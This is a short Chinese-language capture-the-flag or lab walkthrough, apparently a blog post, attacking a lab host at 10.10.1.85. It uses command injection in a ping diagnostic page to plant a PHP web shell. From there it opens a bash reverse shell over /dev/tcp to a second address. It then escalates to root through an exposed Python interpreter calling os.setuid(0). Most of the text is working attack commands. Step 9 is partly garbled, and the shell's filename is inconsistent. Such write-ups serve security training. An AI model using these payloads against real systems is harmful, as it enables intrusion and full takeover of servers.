1.扫描端口
命令:nmap -sV -T4 10.10.1.85
一个20的ssh远程端口 , 一个80的http的Apache
2.进入这个页面
命令:在浏览器里输入10.10.1.85:80
四处点一下,发现只有网络诊断这里可以点进去
3.尝试拼接指令
命令:10.10.1.85;ls
发现不仅ping通了,还把ls当命令执行了。
4.尝试echo写入木马文件
木马命令:<?php echo system($_POST[‘cmd’]); ?>
写入命令:10.10.1.85;echo “<?php echo system($_POST[‘cmd’]); ?>” > 123.php
查看命令:10.10.1.85;cat 123.php
根据查看木马命令是写入成功了,但显示的双引号有点奇怪。
5.尝试调用木马文件
命令:curl -X POST -d “cmd=ls -la” http://10.10.1.85/shell.php
调用成功,看来是显示问题
6.反弹连接并修复交互式
命令:curl -s -X POST http://10.10.1.85/123.php –data-urlencode “cmd=bash -c ‘bash -i >& /dev/tcp/172.16.13.70/4444 0>&1′”
命令:
- python3 -c “import pty;pty.spawn(‘/bin/bash’)” 调用 Pythonpty 模块,为 bash 分配虚拟终端,解决底层终端设备报错。
- Ctrl + Z 将当前反弹 shell 挂入后台
-
stty raw -echo; fg
- stty raw -echo: 本地终端切换原始传输模式、关闭输入重复回显
7.查找flag
命令:grep -r “flag{” /var
利用grep查找flag 进入路径查看发现有另外一个文件,指向一个py的脚本文件
8.查找suid文件
命令:find / -perm -g+s -type f -ls 2>/dev/null
都是正常的系统文件
9.查看netdiag-py文件,尝试调用他
调用后进入了一个交互式解释器界面
命令:10.10.1.85;http://10.10.1.85/123.php –data-urlencode “cmd=bash -c ‘bash -i >&
- import os
- os.setuid(0)
- os.system(“/bin/bash”)
10.直接在注入口连接
命令:10.10.1.85;bash -c ‘bash -i >& /dev/tcp/172.16.13.70/4444 0>&1’
这也可以直接反弹连接












评论(0)
暂无评论